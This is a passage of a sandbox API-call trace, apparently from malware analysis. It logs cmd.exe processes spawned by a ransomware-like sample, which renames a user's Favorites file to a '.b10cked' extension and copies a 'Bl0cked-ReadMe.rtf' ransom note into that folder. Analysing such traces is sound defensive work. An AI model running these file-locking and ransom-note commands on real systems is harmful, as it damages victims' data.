(in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0212.081] _get_osfhandle (_FileHandle=1) returned 0x7 [0212.081] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0212.081] _get_osfhandle (_FileHandle=0) returned 0x3 [0212.081] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0212.081] _get_osfhandle (_FileHandle=0) returned 0x3 [0212.081] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0212.081] GetEnvironmentStringsW () returned 0x3e01a8* [0212.082] 
FreeEnvironmentStringsW (penv=0x3e01a8) returned 1 [0212.082] GetEnvironmentStringsW () returned 0x3e01a8* [0212.082] FreeEnvironmentStringsW (penv=0x3e01a8) returned 1 [0212.082] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e744 | out: phkResult=0x20e744*=0x40) returned 0x0 [0212.082] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e74c, lpData=0x20e750, lpcbData=0x20e748*=0x1000 | out: lpType=0x20e74c*=0x0, lpData=0x20e750*=0xd0, lpcbData=0x20e748*=0x1000) returned 0x2 [0212.082] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e74c, lpData=0x20e750, lpcbData=0x20e748*=0x1000 | out: lpType=0x20e74c*=0x4, lpData=0x20e750*=0x1, lpcbData=0x20e748*=0x4) returned 0x0 [0212.082] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e74c, lpData=0x20e750, lpcbData=0x20e748*=0x1000 | out: lpType=0x20e74c*=0x0, lpData=0x20e750*=0x1, lpcbData=0x20e748*=0x1000) returned 0x2 [0212.082] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e74c, lpData=0x20e750, lpcbData=0x20e748*=0x1000 | out: lpType=0x20e74c*=0x4, lpData=0x20e750*=0x0, lpcbData=0x20e748*=0x4) returned 0x0 [0212.082] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e74c, lpData=0x20e750, lpcbData=0x20e748*=0x1000 | out: lpType=0x20e74c*=0x4, lpData=0x20e750*=0x40, lpcbData=0x20e748*=0x4) returned 0x0 [0212.082] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e74c, lpData=0x20e750, lpcbData=0x20e748*=0x1000 | out: lpType=0x20e74c*=0x4, lpData=0x20e750*=0x40, lpcbData=0x20e748*=0x4) returned 0x0 [0212.082] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e74c, lpData=0x20e750, lpcbData=0x20e748*=0x1000 | out: lpType=0x20e74c*=0x0, 
lpData=0x20e750*=0x40, lpcbData=0x20e748*=0x1000) returned 0x2 [0212.082] RegCloseKey (hKey=0x40) returned 0x0 [0212.082] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e744 | out: phkResult=0x20e744*=0x40) returned 0x0 [0212.082] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e74c, lpData=0x20e750, lpcbData=0x20e748*=0x1000 | out: lpType=0x20e74c*=0x0, lpData=0x20e750*=0x40, lpcbData=0x20e748*=0x1000) returned 0x2 [0212.082] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e74c, lpData=0x20e750, lpcbData=0x20e748*=0x1000 | out: lpType=0x20e74c*=0x4, lpData=0x20e750*=0x1, lpcbData=0x20e748*=0x4) returned 0x0 [0212.083] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e74c, lpData=0x20e750, lpcbData=0x20e748*=0x1000 | out: lpType=0x20e74c*=0x0, lpData=0x20e750*=0x1, lpcbData=0x20e748*=0x1000) returned 0x2 [0212.083] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e74c, lpData=0x20e750, lpcbData=0x20e748*=0x1000 | out: lpType=0x20e74c*=0x4, lpData=0x20e750*=0x0, lpcbData=0x20e748*=0x4) returned 0x0 [0212.083] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e74c, lpData=0x20e750, lpcbData=0x20e748*=0x1000 | out: lpType=0x20e74c*=0x4, lpData=0x20e750*=0x9, lpcbData=0x20e748*=0x4) returned 0x0 [0212.083] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e74c, lpData=0x20e750, lpcbData=0x20e748*=0x1000 | out: lpType=0x20e74c*=0x4, lpData=0x20e750*=0x9, lpcbData=0x20e748*=0x4) returned 0x0 [0212.083] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e74c, lpData=0x20e750, lpcbData=0x20e748*=0x1000 | out: lpType=0x20e74c*=0x0, lpData=0x20e750*=0x9, lpcbData=0x20e748*=0x1000) returned 0x2 [0212.083] 
RegCloseKey (hKey=0x40) returned 0x0 [0212.083] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863ae [0212.083] srand (_Seed=0x5b8863ae) [0212.083] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IEADD-~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE Add-on site.url.b10cked\"" [0212.083] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IEADD-~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE Add-on site.url.b10cked\"" [0212.084] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0212.084] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3e1908, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0212.085] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0212.085] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0212.085] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0212.085] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0212.085] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0212.085] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0212.085] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0212.085] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0212.085] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0212.085] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0212.085] _wcsicmp (_String1="PROMPT", 
_String2="HIGHESTNUMANODENUMBER") returned 8 [0212.085] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0212.085] GetEnvironmentStringsW () returned 0x3e22f8* [0212.086] FreeEnvironmentStringsW (penv=0x3e22f8) returned 1 [0212.086] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0212.086] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0212.086] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0212.086] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0212.086] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0212.086] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0212.086] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0212.086] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0212.086] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0212.086] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0212.086] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20f510 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0212.086] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x20f510, lpFilePart=0x20f50c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20f50c*="Desktop") returned 0x18 [0212.086] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0212.086] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f28c | out: lpFindFileData=0x20f28c) returned 0x3e0038 [0212.086] FindClose (in: hFindFile=0x3e0038 | out: hFindFile=0x3e0038) returned 1 [0212.086] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x20f28c | out: lpFindFileData=0x20f28c) returned 0x3e0038 [0212.086] FindClose (in: hFindFile=0x3e0038 | out: 
hFindFile=0x3e0038) returned 1 [0212.086] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x20f28c | out: lpFindFileData=0x20f28c) returned 0x3e0038 [0212.087] FindClose (in: hFindFile=0x3e0038 | out: hFindFile=0x3e0038) returned 1 [0212.087] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0212.087] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0212.087] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0212.087] GetEnvironmentStringsW () returned 0x3e2b18* [0212.087] FreeEnvironmentStringsW (penv=0x3e2b18) returned 1 [0212.087] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0212.087] GetConsoleOutputCP () returned 0x1b5 [0212.087] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0212.087] GetUserDefaultLCID () returned 0x409 [0212.088] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0212.088] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20f650, cchData=128 | out: lpLCData="0") returned 2 [0212.088] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20f650, cchData=128 | out: lpLCData="0") returned 2 [0212.088] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20f650, cchData=128 | out: lpLCData="1") returned 2 [0212.088] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0212.088] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0212.088] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0212.088] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, 
lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0212.088] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0212.088] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0212.088] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0212.088] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0212.088] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0212.088] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0212.088] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0212.089] GetConsoleTitleW (in: lpConsoleTitle=0x3d08f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0212.089] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0212.089] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0212.089] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0212.089] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0212.090] _wcsicmp (_String1="move", _String2=")") returned 68 [0212.090] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0212.090] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0212.090] _wcsicmp (_String1="IF", _String2="move") returned -4 [0212.090] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0212.090] _wcsicmp (_String1="REM", _String2="move") returned 5 [0212.090] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0212.094] GetConsoleTitleW (in: lpConsoleTitle=0x20f348, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 
0x1b [0212.094] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0212.094] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0212.094] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0212.094] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0212.094] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0212.094] _wcsicmp (_String1="move", _String2="CD") returned 10 [0212.095] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0212.095] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0212.095] _wcsicmp (_String1="move", _String2="REN") returned -5 [0212.095] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0212.095] _wcsicmp (_String1="move", _String2="SET") returned -6 [0212.095] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0212.095] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0212.095] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0212.095] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0212.095] _wcsicmp (_String1="move", _String2="MD") returned 11 [0212.095] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0212.095] _wcsicmp (_String1="move", _String2="RD") returned -5 [0212.095] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0212.095] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0212.095] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0212.095] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0212.095] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0212.095] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0212.095] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0212.095] _wcsicmp (_String1="move", _String2="VER") returned -9 [0212.095] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0212.095] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0212.095] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0212.095] _wcsicmp (_String1="move", 
_String2="ENDLOCAL") returned 8 [0212.095] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0212.095] _wcsicmp (_String1="move", _String2="START") returned -6 [0212.095] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0212.095] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0212.095] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0212.097] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0212.097] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0212.097] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x20f104, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x20f0fc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x20f0fc*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0212.097] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0212.097] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0212.097] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0212.097] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0212.097] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0212.097] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0212.097] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0212.097] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0212.097] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0212.097] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0212.097] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0212.097] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0212.097] _wcsnicmp 
(_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0212.097] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0212.097] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0212.097] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0212.097] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0212.097] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0212.097] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0212.098] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0212.098] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0212.098] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0212.098] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0212.098] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0212.098] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0212.098] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0212.098] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0212.098] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0212.098] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0212.098] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0212.098] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0212.098] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0212.098] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0212.098] _wcsicmp (_String1="IEADD-~1.URL", _String2=".") returned 59 [0212.098] _wcsicmp (_String1="IEADD-~1.URL", _String2="..") returned 
59 [0212.098] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IEADD-~1.URL" (normalized: "c:\\users\\default\\favori~1\\micros~1\\ieadd-~1.url")) returned 0x20 [0212.098] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3e1e80 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0212.099] SetErrorMode (uMode=0x0) returned 0x0 [0212.099] SetErrorMode (uMode=0x1) returned 0x0 [0212.099] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IEADD-~1.URL", nBufferLength=0x104, lpBuffer=0x20ea8c, lpFilePart=0x20ea74 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IEADD-~1.URL", lpFilePart=0x20ea74*="IEADD-~1.URL") returned 0x2f [0212.099] SetErrorMode (uMode=0x0) returned 0x1 [0212.099] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1" (normalized: "c:\\users\\default\\favori~1\\micros~1")) returned 0x10 [0212.099] _wcsicmp (_String1="IEADD-~1.URL", _String2=".") returned 59 [0212.099] _wcsicmp (_String1="IEADD-~1.URL", _String2="..") returned 59 [0212.099] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IEADD-~1.URL" (normalized: "c:\\users\\default\\favori~1\\micros~1\\ieadd-~1.url")) returned 0x20 [0212.099] SetErrorMode (uMode=0x0) returned 0x0 [0212.099] SetErrorMode (uMode=0x1) returned 0x0 [0212.099] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IEADD-~1.URL", nBufferLength=0x104, lpBuffer=0x20ef08, lpFilePart=0x20eca0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IEADD-~1.URL", lpFilePart=0x20eca0*="IEADD-~1.URL") returned 0x2f [0212.099] SetErrorMode (uMode=0x0) returned 0x1 [0212.099] SetErrorMode (uMode=0x0) returned 0x0 [0212.099] SetErrorMode (uMode=0x1) returned 0x0 [0212.099] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE Add-on site.url.b10cked", nBufferLength=0x104, lpBuffer=0x20f110, lpFilePart=0x20eca0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE Add-on 
site.url.b10cked", lpFilePart=0x20eca0*="IE Add-on site.url.b10cked") returned 0x3d [0212.099] SetErrorMode (uMode=0x0) returned 0x1 [0212.099] SetLastError (dwErrCode=0x0) [0212.099] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE Add-on site.url.b10cked" (normalized: "c:\\users\\default\\favori~1\\micros~1\\ie add-on site.url.b10cked")) returned 0xffffffff [0212.099] GetLastError () returned 0x2 [0212.099] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IEADD-~1.URL", fInfoLevelId=0x1, lpFindFileData=0x20e61c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20e61c) returned 0x3d0ed0 [0212.100] FindNextFileW (in: hFindFile=0x3d0ed0, lpFindFileData=0x20e61c | out: lpFindFileData=0x20e61c) returned 0 [0212.100] GetLastError () returned 0x12 [0212.100] FindClose (in: hFindFile=0x3d0ed0 | out: hFindFile=0x3d0ed0) returned 1 [0212.101] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IEADD-~1.URL", fInfoLevelId=0x1, lpFindFileData=0x3e1c20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3e1c20) returned 0x3d0ed0 [0212.101] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE Add-on site.url.b10cked", nBufferLength=0x104, lpBuffer=0x20e8b4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE Add-on site.url.b10cked", lpFilePart=0x0) returned 0x3d [0212.101] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE Add-on site.url", nBufferLength=0x104, lpBuffer=0x20e8b4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE Add-on site.url", lpFilePart=0x0) returned 0x35 [0212.101] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE Add-on site.url" (normalized: "c:\\users\\default\\favori~1\\micros~1\\ie add-on site.url")) returned 0x20 [0212.101] MoveFileExW 
(lpExistingFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE Add-on site.url" (normalized: "c:\\users\\default\\favori~1\\micros~1\\ie add-on site.url"), lpNewFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE Add-on site.url.b10cked" (normalized: "c:\\users\\default\\favori~1\\micros~1\\ie add-on site.url.b10cked"), dwFlags=0x3) returned 1 [0212.102] FindClose (in: hFindFile=0x3d0ed0 | out: hFindFile=0x3d0ed0) returned 1 [0212.102] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x20e868 | out: _Buffer=" 1") returned 9 [0212.102] _get_osfhandle (_FileHandle=1) returned 0x7 [0212.102] GetFileType (hFile=0x7) returned 0x2 [0212.459] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0212.459] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x20e7f4 | out: lpMode=0x20e7f4) returned 1 [0212.459] _get_osfhandle (_FileHandle=1) returned 0x7 [0212.459] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20e828 | out: lpConsoleScreenBufferInfo=0x20e828) returned 1 [0212.459] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0212.460] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x20e868 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0212.460] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x20e84c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x20e84c*=0x1a) returned 1 [0212.460] _get_osfhandle (_FileHandle=1) returned 0x7 [0212.460] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0212.460] _get_osfhandle (_FileHandle=1) returned 0x7 [0212.460] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0212.460] _get_osfhandle 
(_FileHandle=0) returned 0x3 [0212.460] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0212.461] SetConsoleInputExeNameW () returned 0x1 [0212.461] GetConsoleOutputCP () returned 0x1b5 [0212.461] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0212.461] SetThreadUILanguage (LangId=0x0) returned 0x409 [0212.461] exit (_Code=0) Process: id = "519" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16e60" os_pid = "0x248" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], 